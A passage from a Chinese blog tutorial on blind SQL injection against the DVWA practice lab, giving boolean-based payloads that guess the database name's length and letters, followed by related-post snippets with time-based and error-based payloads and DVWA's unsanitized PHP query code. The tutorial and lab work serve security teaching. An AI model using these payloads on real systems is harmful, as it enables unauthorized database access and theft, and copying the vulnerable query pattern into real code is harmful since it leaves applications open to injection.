基于dvwa的sql盲注(Blind)-低中高

最新推荐文章于 2024-07-25 01:02:35 发布
最新推荐文章于 2024-07-25 01:02:35 发布
阅读量3.1k 收藏 19
点赞数 4
文章标签: sql盲注 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43870289/article/details/103085280
版权
本文详细介绍了如何在DVWA中进行SQL盲注,从低、中、高三个级别逐步讲解。通过布尔盲注和时间盲注技术,包括猜测数据库名、表名、列名及数据,展示了SQL注入的过程和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

sql盲注和sql注入的区别

		盲注:目标只会回复是或不是,没有详细内容
		注入:可以查看到详细内容
	盲注分为:布尔盲注、时间盲注

sql盲注过程

		1、判断是否存在注入,注入是字符型还是数字型
		2、猜解当前数据库名(猜解数据库长度->猜数据库名称)
		3、猜解数据库中的表名(猜表的数量->猜表的长度->猜表的名称)
		4、猜解表中的列(猜列的数量->猜列的长度->猜列的名称)
		5、猜解数据

dvwa-SQL Injection (Blind) low级别

下面分别用布尔盲注、时间盲注进行注入

布尔盲注

猜数据库长度:
输入1’ and length(database())=1# 显示 MISSING 说明数据库长度不为1
在这里插入图片描述
输入1’ and length(database())=4# 显示 exists 说明数据库长度为4
在这里插入图片描述
猜数据库名:
输入1’ and ascii(substr(database(),1,1))>97# 显示 exists 说明数据库的第一个字母的ASCII值>97
ascii()函数是将字母转换为ASCII值
在这里插入图片描述
附加:放一张substr()函数的解释
在这里插入图片描述
可以用二分法去猜ASCII值

输入1’ and ascii(substr(database(),1,1))>100#显示MISSING说明第一个字母的ASCII不大于100
在这里插入图片描述
输入1’ and ascii(substr(database(),1,1))<100#也显示MISSING说明第一个字母的ASCII也不小于100,那就是等于100
在这里插入图片描述
输入1’ and ascii(substr(database(),1,1))=100#,显示exists,说明第一个字母就是 d
盲注全靠猜,后三个字母可以自己尝试去猜,步骤如上
最后猜到数据库名为dvwa

猜表的数量:
输入1’and (select count(table_name)from information_schema.tables where table_schema&

最低0.47元/天 解锁文章
滕财然
关注
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL,包括脚本)
weixin_45116657的博客
08-25 6050
目录: 一、SQL SQLSQL入的区别; SQL的过程; 二、实验环境 三、实验过程 基于布尔值的; 基于时间的; 一、SQL简介 1、SQLSQL Injection(Blind),即SQL,目标只会回复是或不是,没有详细内容; 入:可以查看详细的内容 2、手工思路: 手工的过程,就像你和机器人聊天一样,这个机器人知道的...
DVWA--- 八、sql(SQL Injection Blind)
qq_43168364的博客
05-31 873
SQL Injection Blind 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 入点在输入框中,当输入正确时回显如下图 输入错误时的回显 根据回显不同进行布尔,接下来判断入类型 这里是字符型入点字符型入点 判断库名长度,命令:1' and length(database())=4 # 判断库名,命令:1’ and ascii(substr(database(),x,1))=100 #让x的值递增可以遍
渗透测试实验_基于DVWASQL 安全等级Low Medium High
weixin_47133613的博客
03-20 5819
文章目录SQL1. SQL概述2. 基于布尔值的3. 前期实验准备4. Low等级5. Medium等级6. High等级 SQL 1. SQL概述 以下内容引用自《SQL(原理概述、分类): 即在SQL入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为 如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的来获取信息。 是不能通过直接显示的途径来获取数
DVWA-SQL(SQL Injection)/中/高级别
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
dvwasql injection(blind)
Alsn86的博客
01-27 933
dvwasql injection(blind) sql injection(blind)low等级 1.判断出是字符型 2.看当前数据库名字长度1’ and length(database())=4;# 显示正确 所以数据库长度为4 3.判断数据库名字为dvwa 1’ and substr(database(),1,1)=‘d’;# 判断出数据库名字第一个字符为’d’ 1’ and substr(database(),2,1)=‘d’;# 判断出数据库名字第一个字符为’v’ 1’ and
DVWA系列】八、SQL Injection (Blind) SQL入()(源码分析&漏洞利用)
Pluto.的博客
03-12 806
文章目录DVWASQL Injection (Blind) SQL入()一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别 DVWA SQL Injection (Blind) SQL入(SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知。 一、Low 级别 Low级别的代码对参数id没有做任何检查、过滤 查询 id 查询存在
DVWA靶场-SQL Injection (Blind)SQL
mlws1900的博客
03-19 1737
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。length:正整数,指定将从左边返回的字符数。
DVWA通关--SQL(SQL Injection(Blind))
箭雨镜屋
07-11 3823
LOW 通关步骤 代码分析 MEDIUM 通关步骤 代码分析 HIGH 通关步骤 代码分析 IMPOSSIBLE 代码分析
DVWA靶场】Web安全之(布尔值/延时型)SQL(超详细教程)
最新发布
weixin_60838266的博客
07-25 1668
SQL入是一种常见的网络安全漏洞,通过利用网站对用户输入数据的不完善检查和过滤,攻击者可以向数据库服务器发送恶意的SQL查询,从而获取敏感信息或者对数据库进行破坏。在本文中,通过Kali Linux对DVWASQL Injection模块展开了实验,并使用手工和burpsuite工具针对Low、Medium和High等级进行了布尔值/延时型的SQL测试
DVWA--sql(时间)
firecjh的博客
06-09 602
1)使用参数1' and sleep(5) #进行提交,页面明显延迟。使用参数1 and sleep(5) #进行提交,页面没有延迟。说明是基于字符的时间。7)猜解数据库表中的列的数量。8)猜解数据库表中列名称的长度。9)猜解数据库表中的列的名称。5)猜解数据库表名的长度。4)猜解数据库表的数量。6)猜解数据库表的名称。10)猜测用户名和密码。猜解数据库名的长度
DVWA详解
qq_45788625的博客
04-18 7017
low等级DVWA详解
DVWA-2.0 SQL Injection(Blind
小龙在线
09-06 356
SQL Injection(Blind),即SQL,与一般入的区别在于,一般的入攻击者可以直接从页面上看到入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连入语句是否执行都无从得知,因此的难度要比一般入高。目前网络上现存的SQL漏洞大多是SQL。 手工思路 手工的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?,通过这种机械的询问,最终获得你想要的数
DVWA——SQL入+
qq_58553228的博客
06-02 2299
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
DVWASQL Injection (Blind)
kukudeshuo的博客
03-21 263
DVWASQL Injection (Blind) low 查看源代码可知,对输入字符串没有进行任何过滤 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result
DVWASQL Injection(Blind)
baynk的博客
10-29 1263
汇总链接: https://baynk.blog.youkuaiyun.com/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA——SQL Injection (Blind)(low)
分享简单的安全技术
01-11 407
SQL Injection (Blind) 界面 源代码 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS[
dvwa- 08 - SQL Injection (Blind)
qq_53755216的博客
03-04 121
描述 最近看书 这种应该归结于布尔类型的入 Boolean入是指构造SQL判断语句 通过查看页面的返回结果来推测哪些SQL判断条件是成立的, 以此获取数据库中的数据 low 1.判断数据库名的长度 1' and length(database())>3# 1' and length(database())>4# 发现是存在的 而大于4就会报错,所以判断数据库名的长度为4 。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 2.判断数据库名的长度 使用逐字符判断
1.2 DVWA亲测sql漏洞blind
weixin_30360497的博客
04-11 211
LOW等级 我们尝试输入: 即如果页面返回为假,则说明后面的语句成功入 据此我们可以知道 1' and 真 --> 页面显示 “User ID exists in the database.” 1' and...
DVWASQL
RexHa的博客
09-27 2312
DVWA靶场sql入三个级别通关
DVWA SQL脚本全解:三个级别bool技巧
首先,关于“DVWA-SQL脚本(全)”,这部分描述了一个完整的脚本集合,包含了针对DVWASQL漏洞的三种不同难度级别(Low、Medium、High)的攻击脚本。这些脚本专门用于教育目的,用于展示攻击者如何通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值